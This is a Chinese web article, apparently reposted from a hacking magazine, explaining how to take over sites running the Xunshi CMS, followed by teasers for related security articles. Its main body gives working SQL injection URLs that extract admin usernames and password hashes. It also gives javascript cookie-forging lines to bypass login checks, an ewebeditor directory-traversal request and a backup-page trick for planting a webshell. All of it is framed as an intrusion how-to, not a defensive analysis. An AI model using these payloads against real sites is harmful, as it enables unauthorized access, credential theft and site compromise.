驱动管家:安全、高效、精准的专业驱动下载站!

讯时网站存在哪些漏洞?如何获得讯时网站权限?

2018-02-25 08:47:55责编:llp   来源:驱动管家     人气:

以下本文总结来自黑防去年第9期杂志上的内容...

先说一个注入吧:http://www.xx.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%

26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2

这里一个注入

效果如图:

讯时网站存在哪些漏洞?如何获得讯时网站权限?

这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.

密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去

javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));

那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:

因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞

它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以

访问这页面来列目录..步骤如下:

javascript:alert(document.cookie="admindj=1")

http://www.xx.com/edit/admin_uploadfile.asp?id=46&dir=../..

效果如图:

讯时网站存在哪些漏洞?如何获得讯时网站权限?

这样全站目录都能瞧了..找到后台目录..进去..

那么进了后台怎么拿shell??上传--备份就ok了..

那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..

这个我也碰到过一次..你都可以通过列目录来实现..

javascript:alert(document.cookie="admindj=1")

http://www.xx.com/admin/admin_db_backup.asp?action=BackupData

备份ok..

那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?

在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下

然后访问此页面进行注入..步骤如下:

javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")

然后请求admin/admin_chk.asp页面

输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%

26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin

效果如图所示:

讯时网站存在哪些漏洞?如何获得讯时网站权限?

  • 网站漏洞扫描软件nmap有哪些功能?

    网站漏洞扫描软件nmap有哪些功能?

    nmap被开发用于允许系统管理员察看一个大的网络系统有哪些主机以及其上运行何种服务。它支持多种协议的扫描如UDP,TCP connect(),TCP SYN (half open), ftp proxy (bounce attack),Reverse-ident, ICMP

    详情2018-01-30 14:07:38责编:llp   来源:驱动管家     
  • 如何利用fck编辑器漏洞爆路径?

    如何利用fck编辑器漏洞爆路径?

    哈哈 夜猫纸 有木有!!!这编辑器漏洞该有的论坛也有了 也没啥好写的了 这个爆路径也不知道大家遇没遇到过。。刚发现这东东 不敢私用 搬上来分享。如题 爆路径的问题。 原理应该跟其他的爆路径差不多

    详情2018-01-17 18:58:33责编:llp   来源:驱动管家     
  • 360浏览器的优点 360浏览器有什么漏洞?

    360浏览器的优点 360浏览器有什么漏洞?

    产品官方:360安全浏览器是全球首款采用“沙箱”技术的浏览器,能够彻底避免木马病毒从网页上对你的计算机发起攻击。360安全浏览器完全突破了传统的以查杀、拦截为核心的安全思路,在计算机系统内部构造了一个独

    详情2018-01-16 17:30:23责编:llp   来源:驱动管家     
  • 保存软件程序代码内存的方法 这个简单函数可以办到

    保存软件程序代码内存的方法 这个简单函数可以办到

    有时,有些软件有保护,看不到他程序内部是怎么一个样,如果想简单的把他的内存保存下来!我写了一个简单的函数,调用一下就可以把DLL和EXE的内存里的信息全部导到文件里!到时再慢慢查吧!usesTlHelp32;procedure

    详情2018-02-14 19:12:59责编:llp   来源:驱动管家     
  • 公共wifi网络的风险问题 黑客的三大阴招

    公共wifi网络的风险问题 黑客的三大阴招

    大家都知道现在的大部分的公共场合也安装WiFi,那么公共WiFi网络的风险问题再次成为用户关注的焦点,一起来探讨探讨吧。公共WiFi网络的风险问题再次成为用户关注的焦点。黑客可以通过构造假的WiFi网络盗取公共场

    详情2018-02-15 11:38:49责编:llp   来源:驱动管家     
  • 远程文件包含漏洞为什么要包含文件?怎么利用远程文件包含漏洞?

    远程文件包含漏洞为什么要包含文件?怎么利用远程文件包含漏洞?

    首先,我们来讨论包含文件漏洞,首先要问的是,什么才是 "远程文件包含漏洞 "?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可去包含一个恶意文件,而我们可以构造

    详情2018-02-12 17:15:39责编:llp   来源:驱动管家     
  • 电脑杀毒的神奇方法:记事本杀毒

    电脑杀毒的神奇方法:记事本杀毒

    网友们在电脑遇到病毒时,肯定是要杀毒的,但是使用杀毒的方法都是用一般的操作,比如杀毒软件、打开进程管理器关闭不熟悉的进程等。这样的杀毒方式好似太过于单一啦!所以今天小编就为网友们了解一种神奇的杀毒方

    详情2018-01-18 14:12:25责编:llp   来源:驱动管家     
  • 安全的web目录怎么弄?如何用mcafee设置安全web目录?

    安全的web目录怎么弄?如何用mcafee设置安全web目录?

    殊不知此站大有文章,虽手握服务器权限,但仍对Web目录无可奈何 在下一向积极好学,碰到如此变态之服务器,必然是要扒皮抽筋找其原因 首先查看目录权限,发现并无什么特别之处,更何况我现在是管理员权限,应该是畅通无

    详情2018-02-23 14:27:07责编:llp   来源:驱动管家     
  • eset卸载不干净?教你手动彻底卸载eset的方法

    eset卸载不干净?教你手动彻底卸载eset的方法

    如何手动卸载ESET安全产品?KB的解决方案ID:SOLN2289 |最后修改:2010年4月15日在试图手动卸载ESET安全产品,第一次尝试使用安装ESET开始菜单卸载程序与ESET聪明的安全4 x或ESET NOD32防毒软件4 x的规定点击这

    详情2018-02-11 08:44:12责编:llp   来源:驱动管家     
  • 怎么解决苹果浏览器safari处理超长的文件时存在漏洞的问题?

    怎么解决苹果浏览器safari处理超长的文件时存在漏洞的问题?

    Safari处理超长的文件时存在漏洞,如果使用Safari下载了带有超长文件名的文件的话,就可以触发访问破坏,浏览器可能会崩溃。 发布日期:2008-03-22 更新日期:2008-03-24 受影响系统: Apple Safari 3 1 描述: --------------------------------

    详情2018-01-15 12:34:06责编:llp   来源:驱动管家